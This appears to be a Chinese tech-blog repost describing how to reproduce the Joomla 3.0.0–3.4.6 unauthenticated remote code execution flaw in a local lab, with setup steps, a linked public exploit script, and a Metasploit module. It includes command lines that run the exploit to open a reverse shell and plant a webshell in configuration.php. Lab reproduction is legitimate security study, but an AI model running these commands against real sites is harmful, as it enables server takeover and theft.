温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

如何进行Joomla 3.4.6 远程代码执行漏洞复现

发布时间:2021-12-10 15:42:27 来源:亿速云 阅读:314 作者:柒染 栏目:大数据

本篇文章给大家分享的是有关如何进行Joomla 3.4.6 远程代码执行漏洞复现,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。

0x00 简介


Joomla是一套全球知名的内容管理系统。

Joomla是使用PHP语言加上MySQL数据库所开发的软件系统。

可以在Linux、Windows、MacOSX等各种不同的平台上执行。目前由Open Source Matters开源组织进行开发与支持。

0x01 漏洞概述


Alessandro Groppo @Hacktive Security于2019-10-02在exploit-db( https://www.exploit-db.com/exploits/47465)发布了Joomla命令执行的EXP,漏洞本质是Joomla对session数据处理不当,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。

0x02 影响范围


3.0.0 <= Joomla <= 3.4.6

0x03 环境搭建


懒人搭建php环境当然是选择wamp/phpstudy啦

下载链接:

https://downloads.joomla.org/it/cms/joomla3/3-4-6 

下载解压后放入wamp/www/Joomla或者phpstudy/PHPTutorial/WWW/Joomla/目录下,访问http://127.0.0.1/Joomla/准备安装

安装流程如下:

如何进行Joomla 3.4.6 远程代码执行漏洞复现

如何进行Joomla 3.4.6 远程代码执行漏洞复现

默认root/空

如何进行Joomla 3.4.6 远程代码执行漏洞复现

如何进行Joomla 3.4.6 远程代码执行漏洞复现

如何进行Joomla 3.4.6 远程代码执行漏洞复现

至此,环境搭建完毕。

0x04 漏洞利用


下载漏洞利用脚本:

https://github.com/kiks7/rusty_joomla_rce

漏洞检测: 

python3 rusty_joomla_exploit.py -t http://127.0.0.1/Joomla/ -c

注意URL一定要以/结尾 /结尾 /结尾 (别问我为什么, 说多了都是泪…脚本里有url拼接)

如何进行Joomla 3.4.6 远程代码执行漏洞复现

漏洞利用: 

python3 rusty_joomla_exploit.py -t http://127.0.0.1/Joomla/ -e -l 127.0.0.1 -p 2333

(-e -l -p参数可以反弹shell, 本文并没有反弹成功, 但是可以看到马的密码)

如何进行Joomla 3.4.6 远程代码执行漏洞复现

一句话客户端连接

http://127.0.0.1/Joomla/configuration.php

由于贫道用的公司的办公电脑没有菜刀之类的工具简单截个hackbar返回的图:

如何进行Joomla 3.4.6 远程代码执行漏洞复现

BY THE WAY…

作者同时提供了msf下的EXP:

metasploit_rusty_joomla_rce.rb 

轻轻放入目录: 

/usr/share/metasploit-framework/modules/exploits/multi/php/

msfconsole -> reload_all -> search joomla_rce -> use xxxxx -> info

0x05 修复方式

更新至官网最新版本

以上就是如何进行Joomla 3.4.6 远程代码执行漏洞复现,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI